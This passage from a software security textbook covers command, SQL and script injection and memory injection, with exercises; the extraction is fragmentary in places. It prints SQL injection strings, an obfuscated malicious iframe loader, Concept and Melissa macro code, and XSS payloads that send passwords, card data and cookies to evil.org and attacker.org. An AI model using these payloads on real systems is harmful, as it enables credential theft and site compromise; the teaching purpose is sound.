A Three solutions:
x Tautology Attack: "1 or 1=1". This will always evaluate to true regardless of
the contents of Authentication.
SELECT * FROM Authentication WHERE netID=1 or 1=1;
x Additional Statement Attack: “1; DROP TABLE Authentication” . This will fail the
SELECT statement but the next statement will destroy the Authentication
table.
SELECT * FROM Authentication WHERE netID = 1; DROP TABLE Authentication;
x Union Query Attack: “1' UNION SELECT Authenticate FROM userList.” This will
append a second query onto the first which will succeed.
SELECT * FROM Authentication WHERE netID = 1'
UNION SELECT Authentication FROM useList;
114 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
2. Q Consider the following PHO code exhibiting a command injection vulnerability:
<?php
$command = 'type ' . $_POST['username'];
exec($command, $res);
x The code can be mitigated by using another means to get a file listing:
<?php
if (is_dir($_POST['username']))
{
if ($directory = opendir(($_POST['username']))
{
while (($file = readdir($directory)) !== false)
echo $file . '<br>';
closedir($directory);
}
}?>
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 115
Exercises
1 Define in your own words the following terms:
x Command Injection
x SQL Injection
x FTP Injection
x SHELL Injection
x Tautology Vulnerabilities
x UNION Query Vulnerabilities
x Additional Statement Vulnerabilities
x Comment Vulnerabilities
connection.Open();
command.ExecuteNonQuery();
connection.Close();
116 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
4 For the following PHP code, answer the following questions:
x What is the code meant to do?
x What is the vulnerability?
x How can it be exploited?
x How should it be mitigated?
<?php
$host = 'byui.edu';
if (isset( $_GET['hostName'] ) )
$host = $_GET['hostName'];
system("/usr/bin/nslookup " . $host);
?>
<form method="get">
<select name="host">
<option value="server1.com">one</option>
<option value="server2.com">two</option>
</select>
<input type="submit"/>
</form>
?>
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 117
6 For the following PHP code, answer the following questions:
x What is the code meant to do?
x What is the vulnerability?
x How can it be exploited?
x How should it be mitigated?
<?php
$value = $argv[0];
$query = "SELECT id, name " .
"FROM products " .
"ORDER BY name " .
"LIMIT 100 OFFSET $value;";
$result = odbc_exec($connection_id, $query);
?>
118 | Chapter 05: Command Injection | Unit 2: Code Hardening | Security for Software Engineers
Problems
1 According to Friedl, there are four steps to exploiting a SQL vulnerability. How
can we introduce roadblocks at every step of the process?
x Identify that the user input is used to construct a SQL query.
x Guess the underlying structure of the query.
x Determine the table and field names.
x Manipulate the queries to yield the desired outcome.
return 0;
}
4 Find an article describing a real SQL injection attack. This could be a news story,
a technical explanation, or a description of the cleanup that resulted.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 05: Command Injection | 119
Chapter 06: Script Injection
Script injection vulnerabilities are among the most common on the web today. Knowing how to find them
and fix them is a core software engineering skill.
The original document file formats developed in the 1970’s consisted only of user
data. It was impossible to embed commands or other types of code in a
document. This changed when Lotus 1-2-3 version 2 introduced a macro language
to their file format. Through this capability, a 3rd party developer could implement
Script injection functionality that did not exist in the original released product. With this added
arises when an attacker power, Lotus 1-2-3 became a popular platform for custom 3rd party solution
is able to providers.
execute commands
on a victim’s computer Document macros and scripts are two mechanisms to extend the power of a
beyond those which are platform by giving authors the ability to execute code on a client’s computer.
allowed by policy. Macro and scripting languages are designed to be powerful for this very reason.
With this power, however, comes the opportunity for malicious users to embed
programs in seemingly benign documents that compromise a victim’s
computational resources. Harold Highland first described the possibility of macro
malware in 1989 and it was successfully demonstrated in March of that year,
more than six years before the first macro virus was found in the wild.
Script injection is a class of vulnerabilities where a malicious user is able to
execute commands on a victim’s computer beyond those which are allowed by
system policy. There are two components to this definition. Each will be
examined in depth.
Interpreter The victim’s computer must provide a mechanism for outside users to execute
commands. Thus, like command injection studied earlier, an interpreter must
exist on the victim’s system. The big difference between command injection and
script injection is that the victim intentionally provides the outside user with
access to the interpreter. In the case of the typical e-commerce scenario, the
victim will run a browser with JavaScript enabled so an outside user (the e-
commerce site itself) can execute commands. Script injection cannot exist if the
victim does not provide the outside user with a command interpreter.
120 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
Policy For script injection to occur, there must be a distinction between that which is
allowable and that which is not. When scripting was implemented on a client
system, it was clearly designed to provide an extra degree of functionality to the
user. Thus there must be a degree of functionality that is specifically allowable
and desirable. Script injection only occurs when this provided degree of
functionality exceeds what is safe. For example, consider JavaScript in an e-
commerce application. It is desirable for the JavaScript to validate the user input
data in a web form to ensure it is the correct format. It is not desirable for the
JavaScript to erase the user’s documents on the client computer. The former
adheres to system policy and is thus not script injection whereas the latter
violates system policy and thus can be classified as script injection.
Script injection occurs when either the interpreter has a defect allowing actions
to occur which are outside the design, or when the policy of the interpreter is
different than that of the system the interpreter is meant to serve.
For example, consider the common scripting language JavaScript. This language
is designed to operate within a “sandbox,” namely it is designed to have no
interaction with the operating system outside a well-defined boundary. What
would happen if there were a bug with the JavaScript interpreter on a common
web browser? Specifically, what if Google Chrome allowed an extra command to
exist which is outside the JavaScript ECMAScript 3.1 specification allowing for
access to the file system? This defect in the interpreter would thus be a script
injection vulnerability.
Another example would be when the policy of the interpreter is different from
that of the application using the scripting engine. JavaScript is a scripting language
that, by design, has access to the document surface. This allows a JavaScript
program to read data from the currently displayed web page. All of this is in line
with the policy of the interpreter. An e-commerce web site such as Amazon would
probably have a policy prohibiting the author of a customer review to have access
to the shopping cart. Imagine a customer who wrote a review containing
JavaScript. This JavaScript would have complete access to the page, including the
shopping cart! The result is more access than Amazon intended, a script injection
vulnerability. To mitigate this vulnerability, Amazon needs to remove all instances
of JavaScript in customer reviews.
There are two main flavors of script injection attacks: direct and reflected. Direct
script injection occurs when a malicious outside user authors a document with an
embedded script and sends the document directly to the victim. Reflected script
injection occurs when an outside user places a malicious document on a host
computer which is then opened by the victim.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 121
Direct Script Injection
A Direct Script Injection attack occurs when the attacker sends a document with
an embedded malicious script directly to the victim. This may occur when the
victim opens an e-mail attachment with a script attached or when the victim visits
a web site with embedded scripts. In each case, the following prerequisites must
be met:
1. Scripting Functionality The document file format must support scripting. This is not the case with .TXT,
.GIF, or .DOCX files. Many document viewers support scripting, including web
browsers and e-mail clients as well as several document editors, music players,
and picture viewers. Additionally, the victim must have scripting enabled on his
document viewer. Most document viewers have scripting on by default and not
all document viewers even have the ability to disable scripting.
2. Malicious Code Many scripting languages do not give the programmer the ability to compromise
the confidentiality, integrity, or availability needs of the user. The process of
limiting scripting power for this purpose is called “sand-boxing.” When a script
has the power to do the user harm, the potential for Direct Script Injection
attacks is present.
3. Victim Opens the The final condition is that the victim must be convinced to open the document
Document containing the payload script. Attackers commonly use social engineering
techniques to fulfill this final requirement.
The potential and severity of direct script injection attacks depend greatly on the
power vested in the scripting engine. In the early days of macros and scripting,
little attention was paid to this fact; macro and scripts were given vast power so
more useful programs could be executed. As a result, early direct script injection
attacks were severe. Today, great care is placed in defining and curtailing the
power of these scripting engines. In all cases, the first step to understanding
direct script injection is to become deeply acquainted with the associated
scripting engine.
122 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
Mitigation
As with command injection vulnerabilities, there are three ways to mitigate direct
script injection:
Complete Complete mitigation is to remove any possibility of script injection by removing
the interpreter. This is one of the main techniques used today. Most modern file
formats do not have macro or scripting functionality. Even the web is moving
away from scripting. HTML5 is designed, in many ways, as a replacement for
scripting.
Strong A strong approach is to white-list those constructs which are allowable. For the
most part, this involves limiting the interactions between the scripting language
and the document surface.
Weak A weak approach is to black-list those constructs known to be dangerous. This is
particularly difficult when there are many ways to accomplish the same task.
WordBASIC
Following Lotus’ introduction of a macro language for 1-2-3, a large number of
custom applications were written for the platform. Many companies tried to
replicate Lotus’s success, not the least of which was Microsoft. Seeing the vast
potential for scripting in a word processor and eager to give the application
developers as much power as possible, Microsoft introduced WordBASIC in 1989.
This macro language was built off of Microsoft QuickBASIC but had many typeins
to the Microsoft Word document surface. For example, the following would place
the bold text “WordBASIC” on the document surface:
Sub MAIN
Bold 1
Insert "WordBASIC"
End Sub
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 123
In 1995, the first script injection virus (called “macro virus” at the time) called
Concept was released (Bezroukov, 1999). The name came from the fact that the
virus had no payload, only the following comment:
Sub MAIN
REM That’s enough to prove my point
End Sub
The virus spread because, whenever a .doc document is opened, Word looks for
a macro named AutoOpen. If that macro exists, then the contents are immediately
executed. Concept’s AutoOpen contained code to copy itself to all other open .doc
files. The code in AutoOpen is:
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
During 1997, the harmless Concept virus was the most common piece of malware
in the wild, accounting for about one half of all infections. Microsoft itself
unknowingly included copies of Concept on CDs sent to customers and affiliates.
The main result of the Concept event was to awaken the world to the potential of
script injection.
Observe how all three prerequisites for script injection were met:
1. Scripting Functionality All copies of Microsoft Word had scripting enabled.
2. Malicious Code The WordBASIC language had sufficient power to replicate and cause the victim
harm.
3. Victim Opens the It was common to pass documents via e-mail in the 1990’s.
Document
124 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
On the 26th of March, 1999, David Smith released the Melissa virus into the wild
from his home in New Jersey. By the end of the day, several large corporations
were compelled to suspend their e-mail servers. Though there was no malicious
payload associated with Melissa, between $80 million and $1.1 billion in damages
and lost service resulted from the outbreak. Through a collaboration of law
enforcement officers around the world, Smith was identified as the originator of
the virus and was sentenced on the 9th of December, 1999. Said Smith, “In fact, I
included features designed to prevent substantial damage... I had no idea there
would be such profound consequences to others.” He received a prison sentence
of 5 years.
The Melissa virus ran in VBA and was modeled after the Concept WordBASIC virus.
The avenue of spreading was an e-mail. Usually the subject would say “Important
message from <recipient>” and an infected Word .doc would be the attachment.
The macro also contained a check for a registry key named “Melissa?” in which
the value was “… by Kwyjibo”. If the registry key existed, then the macro would
not spread. It is from the key name Melissa that the virus got its name and Kwyjibo
was David Smith’s alias. David used the name Melissa because it was the name of
a woman of ill repute who lived in Florida.
The following code appeared at the end of the macro:
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText
" Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.
Game’s over.
I'm outta here."
End Sub
Observe how the four prerequisites for direct script injection were present in the
Melissa virus:
1. Scripting Functionality The .DOC, .XLS, and .PPT file formats support VBA. Similarly, scripting was enabled
by default on all installations of Microsoft Office ’97.
2. Malicious Code VBA had extensive power to interact with documents, modify templates, interact
with the file system, and modify the user interface.
3. Victim Opens the Document sharing through e-mail attachments was very popular and considered
Document safe.
In the wake of the Melissa virus, Microsoft included a black-list filter to remove
all macros matching Melissa’s signature. Of course, this filter was easy to
circumvent. A more comprehensive solution was to follow in Office 2007. Here
the .DOCX format was introduced which, among another things, lacked the ability
to host macros. If a user wished to have a macro-embedded document, the .DOCM
extension was required. This small change largely put an end to VBA macro
viruses.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 125
JavaScript
At the end of 1995, Netscape introduced JavaScript as the first scripting language
in a web browser. JavaScript introduced the notion of a “sand-box:” tight
restrictions on the influence of a script to the user’s computer. These restrictions
include no file-system access, inability to establish a network connection, and the
inability to access other web pages displayed by the browser (called “same-
origin”). Despite these restrictions, several examples of Direct Script Injection
have resulted from JavaScript vulnerabilities.
For example, consider the following JavaScript found in a hacked site:
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+
((c=c%a)>35?String.from
CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--
){d[e(c)]=k[c]||e(c)}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5
0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o
.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-
1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do
cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get
ElementById|function|createElement|iframe|appendChild|src|id|nl|msie|
toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navi
gator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>
The author went through a great deal of trouble to make the intent difficult to
understand. It can be simplified to:
document.write("<iframe src='http:// malicious.com/in.php?a=UNIQUE-ID'
style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
126 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
1. Scripting Functionality JavaScript has become a common addition to virtually all HTML scenarios (such
as web browsing, e-mail, help, and forms). Note that JavaScript is on by default
in most HTML scenarios.
2. Malicious Code JavaScript has sufficient power to implement key-logging spyware, pop-up
adware, and spoofing trojans.
3. Victim Opens the Most computer users view dozens of HTML pages every day.
Document
The code gets placed at the top of this young web engineer’s page and, to his
surprise, everything from “really” down to the bottom of the page starts blinking.
In other words, the malicious user is able to deface the page and make it difficult
to read (Champeon, 2000).
How did this happen? Three parties are needed: the attacker, the host, and the
victim. In the above scenario, the attacker is the user who adds the <blink> tag
to the comment field. The host is the web site that holds the malicious user’s text
and displays it to a victim. The victim is the individual who views the web page.
XSS occurs when an attacker is able to place content or code on a host’s web site
that is against the host’s policy. This content or code then has an undesirable
effect for the victim. In this case, the attacker was able to place a <blink> tag on
a web page residing on the host’s web page. For a reflected script injection attack
to occur, the following steps must take place:
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 127
Step 1 It must be possible to perform some action that is outside the host’s policy and
Create the Payload is undesirable for the victim. In other words, the potential to do harm must exist
given the technology the host is using. This usually means that the JavaScript
interpreter is available. In the simple example presented above, the payload is
the <blink> tag.
Step 2 The attacker must be able to insert the payload onto the host web site. If the
Insert Payload Onto Host attacker does not have the ability to post content onto a host web page or if the
host is able to filter out the attacker’s payload, then no reflected attack is
possible. In the example above, the user comment mechanism in the attack
vector in which the attacker is able to insert the payload onto the host.
Step 3 The victim must view a page from the host with the attacker’s payload. If the host
Victim Views the Page does not serve the page to the victim or if the victim does not render the page,
then a reflected attack is not possible. In the above example, the other user must
view the web page.
Step 4 The payload must have the ability to cause harm to the victim or the host. In the
Exploitation above example, the page is unreadable because large tracts of text are blinking.
Mitigation
As with direct script injection attacks, there are many ways to mitigate against
XSS attacks:
Complete The safest way to stop all script injection attacks is to disable the interpreter.
Unfortunately, most web scenarios do not work without scripting enabled. In
other words, we may succeed in preventing one type of attack only to introduce
a denial attack.
Strong When complete mitigation is not possible, the next safest thing to do is to
enumerate the safe constructs that are allowed on a host’s site. In the <blink>
scenario, the web engineer could list all HTML tags that are allowable (such as
bold, underline, and hyperlink). Any tag not present on this safe list is then
filtered out.
Weak A weak approach is to black list constructs that are known to be dangerous. In
this case, we could filter out all <blink> tags. Note that there may be a variety
of other ways to introduce blinking into a web page (such as through CSS) or other
ways to deface the site. In other words, weak mitigation or blank lists is not a very
reliable way to solve this problem.
Tag Manipulation
The first type of XSS involves the attacker manipulating the structure of a web
page. For example, consider the following HTML code:
<form id="forms" action="/processRequest.php">
Credit card number: <input type="text" name="number"/><br/>
Expiration date: <input type="text" name="date"/><br/>
Card validation value: <input type="text" name="cvv2"/><br/>
<input type="submit" value="Submit"/>
</form>
128 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
This code, similar to that which you could find on many e-commerce sites,
prompts the user for their credit card number, the expiration date, and the card
validation value. The resulting data is then sent to “processRequest.php.”
The attacker wishes to receive this information for the purpose of making an
illegal purchase. To do this, he wishes to change “processRequest.php” to
“evil.org/processRequest.php”. This simple change will redirect the credit
card payload to evil.org. The attacker can do this through tag manipulation.
In the above example, there exists a banner ad. The HTML code for the ad is
inserted directly into the web page containing the credit card request. The format
of the banner ad is the following:
<a href="www.someWebPage.com"><img src="www.someWebPage.com/src.jpg"/></a>
Our attacker, however, submits the following code for the banner ad:
<a href="www.mySite.com">
<script>
document.getElementById('forms').action = "evil.org/processRequest.php";
</script>
<img src="www.mySite.com/src.jpg"/>
</a>
What will happen when this banner ad is rendered? It will manipulate the <form>
tag of the credit card submission form so the data is sent to evil.org rather than
to the intended recipient.
Tag manipulation occurs in the following way:
Step 1 The malicious user will start by analyzing the HTML source of the target web page.
Create the Payload Here, he or she notices the opportunity to steal a user asset by changing the tag
structure. This can be done with the following JavaScript:
document.getElementById('forms').action="evil.org/processRequest.php";
Step 2 The trick is to place this JavaScript in a web page. Clearly such code is against the
Insert Payload Onto Host policy of the owner of the web page! However, with some investigation, the
attacker realizes that code from the ad server is not sanitized. Thus by submitting
the following ad, the attacker is able to insert the payload onto the unsuspecting
host.
Step 3 Next the victim visits the web site and attempts to make a purchase. The victim
Victim Views the Page ignores the ad on the bottom of the page, not realizing that the ad actually
changed the tag structure of the web form and changed the destination of the
credit card data.
Step 4 When the victim hits [submit] on the web form, the credit card data is sent to
Exploitation evil.org. Not only did the purchase not go through as intended, but many
unexpected charges appeared on his or her statement at the end of the month!
Preventing attacks such as this is difficult. It is not practical to totally ban all
scripting on an e-commerce web site. Thus the best option is to carefully sanitize
user input. In this case, the ad server should be performing the sanitization with
a white-list enumerating the type of tags and data allowable for a URL.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 129
DOM Reading
It is commonly the case that a given web page displays confidential user
information. These include but are not limited to: user name and password, credit
card numbers, Personally Identifiable Information (PII). For example, consider a
social networking site such as stackOverflow.com. Here, an essential part of the
business model is to host user content. While you can freely view content, you
must enter your username and password if you wish to add content of your own.
To make this convenient, the Log In code is hosted on the same page as the
content. An attacker would like to retrieve the credentials of unsuspecting users.
He notices that the login code is the following:
<form id="login-form" method="POST">
<label for="email">Email</label><br/>
<input type="email" name="email" id="email" /><br/>
<label for="password">Password</label><br/>
<input type="password" name="password" id="password"><br/>
</form>
It would be wonderful if the user could read this data and send it to his server.
How does he do this? Thorough DOM reading:
Step 1 The following code would do the trick:
Create the Payload var eMail = document.getElementById('email').value;
var payload = email.concat(".",document.getElementById('password').value);
Now we want to send this data to evil.org. This can be done by issuing a request
for data on the server. Specifically, we will ask for the image
“evil.org/payload/username.password.jpg”. When the server sees a request for
a JPG from the payload directory, it will save the filename and later break out the
username and password component. The following code will send the payload:
<img src="http://evil.org/payload/'+payload+'.jpg'"/>
Step 2 The JavaScript needs to be put in a web page. Here the user responds to a post
Insert Payload and inserts the above code. The host then stores the data in the database.
Step 3 Next the victim visits the web site. She reads the posts and wishes to make one
Victim Views the Page herself. She clicks on the login button and types her credentials. Unbeknownst to
her, a copy of her data is made and sent to evil.org.
Step 4 The attacker receives the victim’s credentials and is able to impersonate her on
Exploitation the site.
130 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
Cookie Theft
A cookie is a string that the browser stores on a web site’s behalf to help maintain
session state. They were invented in 1994 by the Netscape Corporation and rolled
out in version 0.9 beta of Mosaic browser. Cookies are only accessible by the web
site that generated them; no web site has access to another site’s cookie. A given
web site can keep any textual data in a cookie that they choose. The browser does
not interpret the data, it only stores it and passes it back to the server. For
example, a web site may keep a reference counter to keep track of how many
times a given user has visited. Every time the web site receives a cookie, it sets
the next value with one greater.
Today cookies are commonly used to store session data. Once a user is
authenticated, then a large random number is stored in the cookie. With the next
web page request, the random number is sent back to the web site so it can
associate the web request with the previous authentication results. Cookie theft
occurs when an attacker is able to obtain a cookie from a victim and then
impersonate him or her.
It is possible to access a document’s cookie in JavaScript with the following code:
document.cookie
This enables the web site to include client-side processing that provides a richer
session-layer experience.
On the 24th of October, 2014, Benjamin Mussler discovered a XSS vulnerability in
Amazon’s Kindle Library web site with the potential to completely compromise a
victim’s Amazon account. The vulnerability was closed on the 16th of September,
2014. An attack would go something like this:
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 131
Step 1 The malicious user will start by creating a Kindle book with the following name in
Create the Payload the title:
Book <script>document.write(
"<img src='http://attacker.org/a.gif?x="+document.cookie+"'>"
)<script> Title
Cookie theft such as this Amazon example represent one of the most common
and severe XSS attacks on the web today.
132 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
AJAX Manipulation
In 2005, a 19-year-old named “Samy” made himself the most popular person on
MySpace by creating an XSS worm. The worm propagated with some script that
added the text “Samy is my hero” to the bottom of the profile of anyone who
viewed an infected page. He had 200 friends in the first 8 hours. He had 2,000
friends a few hours later. Shortly after that, he had 200,000 friends. By the end of
the first day the number crossed a million. His comment was very interesting:
I wasn't sure what to do but to enjoy whatever freedom I had left, so I went to
Chipotle and ordered myself a burrito. I went home and it had it 1,000,000.
(Lai, Computerworld, 2005)
Samy was able to launch this attack in the following way:
Step 1 MySpace performed white-list filtering of user content to only allow <a>, <div>,
Create the Payload <embed>, and <img> tags. However, CSS was not filtered so tags could be added
that way:
<div expr="alert('XSS')"></div>
MySpace was clearly aware of reflected injection attacks and went through great
pains to prevent these from happening. However, their relying on blacklist (weak
mitigation) rather than whitelist (strong mitigation) meant that most of the
safeguards could be side-stepped.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 133
Examples
1. Q Classify the following as direct or reflected script injection: Opening a web page
causes a script to run which will erase your hard drive.
A Direct because only two parties are involved: the attacker and the victim.
A Reflected because the 3rd party review was able to place JavaScript into the page
which stole the user’s cookie. This enabled the attacker to log in as the user and
manipulate the shopping cart. Notice that there are three parties involved: 1)
the attacker who wrote the review and provided the JavaScript, 2) the bystander
(Amazon) who hosted the attacker’s script, and 3) the victim who viewed a page
built from the attacker’s code and the bystander’s code.
A Direct because only two parties are involved: the attacker and the victim.
4. Q List, describe, and cite four client-side scripting languages used on the web.
134 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
Exercises
1 Recite by memory the three conditions that must be met for a Direct Script
Injection attack to be successful.
2 Recite by memory the four conditions/steps that must be met for a Reflected
Script Injection attack to be successful.
3 Is your favorite content managment immune to XSS attacks? How would you
find out?
4 Why is it more dangerous to execute script on someone else’s web site than on
the attacker’s own web site?
5 What does the following code do that was found embedded in an Amazon
review?
<img src="http://trusted.org/account.asp?ak=<script>
document.location
.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
Security for Software Engineers | Unit 2: Code Hardening | Chapter 06: Script Injection | 135
Problems
1 What happens when the following URL is opened?
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E
3 If you were to re-write the HTML standard from scratch, how would you design
scripting to make it powerful and secure?
4 Find an article describing a real script injection attack. This could be a news
story, a technical explanation, or a description of the cleanup that resulted.
5 Describe whether code may or may not be embedded in a given file format. If
code may be embedded, describe how much power that scripting language has.
x DOCX: Can the Office 2007 files (.docx, .xlsx, .pptx) contain macros? Cite
your answer.
x DOC: Can the old Office 97 files (.doc, .xls, .ppt) contain macros? Cite your
answer.
x PDF: Can a PDF file contain a macro? Cite your answer.
x Flash: Can an Adobe (formerly Macromedia) Flash file contain a macro?
x MP3: Can an MP3 sound file contain a macro? Cite your answer.
6 The text describes several forms of XSS attacks: tag manipulation, DOM reading,
cookie theft, and AJAX manipulation. Find an article describing another form of
XSS.
136 | Chapter 06: Script Injection | Unit 2: Code Hardening | Security for Software Engineers
Chapter 07: Memory Injection
The vast majority of all malware spreads by exploiting memory injection vulnerabilities. In the early days of
software development, it was common for software engineers to be ignorant of these vulnerabilities and
accept that they inevitably exist in the code. Those days are past. Now it is not uncommon for someone to
lose their job because they introduced a memory injection vulnerability. Therefore, every software
engineer has to be very good at identifying and fixing these vulnerabilities.
Every computer designed and built before the 1940’s was designed to accomplish
a single specific task (such as computing tide tables or calculating ballistic
Memory injection
trajectories). It was not possible to reconfigure a computer to perform a different
arises when
task without a change to the computer’s hardware. John von Neumann changed
an attacker is able to
this with the introduction of a stored-program-computer. Now programs are
alter the intended
stored in the computer’s memory, not embedded in the hardware logic of the
flow of a program
computer itself.
through carefully
crafted input. One vulnerability inherent in all von Neumann computers is that it is impossible
to tell whether a given location in memory is storing an instruction or program
data. Similarly, any location in memory can be interpreted by the CPU as an
instruction by setting the instruction pointer (IP) to that address. Thus if an
attacker is able to direct the flow of a program from the intended course to a
location of memory containing malicious instructions, the integrity of the
program can be compromised.
Memory injection attacks occur when an attacker is able to alter the intended
flow of a program through carefully crafted input. This can happen a variety of
ways, but the most common is to put machine language instructions into an input
buffer and then trick the program into considering the buffer as part of the
program.
Public enemy #1, the stack buffer overrun, is one such memory injection
vulnerability. This attack vector occurs when assembly is inserted into an
outwardly facing buffer such as a string input field. If the user is able to provide
more data to the string than the buffer is designed to hold, then the stack pointer
(residing after the buffer on the stack) can be overwritten. In this case, when the
function is returned, the IP is set to the attacker’s malicious code and the program
is compromised.
The most common types of memory injection attacks include array indexing,
pointer subterfuge, arc injection, V-Table smashing, stack smashing, heap
smashing, integer overflow, ASCI-Unicode mismatch, and VAR-args (Pincus &
Baker, 2004).
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 137
Array Index
Arrays provide arbitrary access to the elements of data in memory. Note that if
the index specified is larger than the size of the buffer then there is buffer
overflow. The same would occur if the index specified is lower than the first index.
Arrays are frequently stored on the stack so if there is a buffer overflow, then it
is possible to access the stack. This access can lead to stack frame pointer
tampering or modification of other local variables.
For an array index vulnerability to exist in the code, the following must be
present:
Vulnerability 1. There must be an array and an array index variable.
2. The array index variable must be reachable through external input.
3. There must not be bounds checking on the array index variable.
{
int array[4];
bool authenticated = false; // the asset
Example int index;
cin >> index;
array[index] = 1; // if index == 5, problem!
}
The best way to prevent array index bugs is to make sure that the buffer size of
the array is always passed with the array so the callee can check the bounds of
Mitigation
the array with the correct value before any array access. This can be
accomplished by encapsulating the array in a class.
Note that most modern languages such as Python and Ruby throw an exception
if an invalid index is utilized.
138 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
Array index vulnerabilities are possible because arrays are, by definition, a
continuous block of data on the stack, heap, or code segment of memory.
Because of the way that the compiler treats the array [] operator (please see
Appendix A: Arrays for details as to how this works), an array index is actually an
offset to the location in memory where the array resides.
Consider the vulnerable code previously mentioned:
{
int array[4];
bool authenticated = false; // the asset
int index;
cin >> index;
array[index] = -1; // if index == 5, problem!
}
ff ff ff ff
int index;
cin >> index;
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 139
Pointer Subterfuge
Pointer subterfuge is the process of overwriting a pointer so the pointer refers to
different data than the code author intended. Since pointers are commonly used
in many programs, this becomes a difficult vulnerability to counter.
For a pointer subterfuge vulnerability to exist in the code, the following must be
present:
1. There must be a pointer used in the code.
Vulnerability 2. Through some vulnerability, there must be a way for user input to
overwrite the pointer. This typically happens through a stack buffer
vulnerability.
3. After the pointer is overwritten, the pointer must be dereferenced.
{
long buffer[2];
char * p = "Safe";
Only languages that use “dumb pointers” such as C and C++ have the potential to
have pointer subterfuge vulnerabilities.
140 | Chapter 07: Memory Injection | Unit 2: Code Hardening | Security for Software Engineers
To illustrate how this works, consider the following code:
{
long buffer[1];
char * p1 = "Safe";
char * p2 = "Rosebud"; // the top secret password
Here there are two pieces of data in the system: some safe data (corresponding
to the “safe” string) and some highly confidential data:
0x00400c60 0x00400c72
S a f e \0 R o s e b u d \0
buffer p1 p2
0x00400c60 0x00400c72
buffer[0]
Figure 07.3: Memory organization before a pointer subterfuge attack
Now in this case, the buffer variable is an array (with just one element) that
resides on the stack. The two c-strings, on the other hand, do not! They actually
reside in the code segment of memory. Thus “Safe” exists in the code and the
pointer to safe (p1 in this case) resides on the stack. The same is true for the top-
secret password “Rosebud.”
In this case the string “Safe” resides in location 0x00400c60 and “Rosebud”
resides in location 0x00400c72. The user somehow is aware of these locations
and inputs the value 4197490 (because 4197490 base 10 is the same as
0x00400c72 in hexadecimal). Thus the layout of memory will change:
0x00400c60 0x00400c72
S a f e \0 R o s e b u d \0
buffer p2
p1
0x00400c72 0x00400c72
buffer[0] buffer[1]
Security for Software Engineers | Unit 2: Code Hardening | Chapter 07: Memory Injection | 141
ARC Injection
ARC injection is similar to pointer subterfuge except a function pointer is
overwritten instead of a data pointer. This is the process of overwriting a function
pointer so, when it is dereferenced, a different function from the intended one
gets executed. The potential for this vulnerability exists whenever function
pointers are used in the code.
For an ARC Injection vulnerability to exist in the code, the following must be
present:
1. There must be a function pointer used in the code.
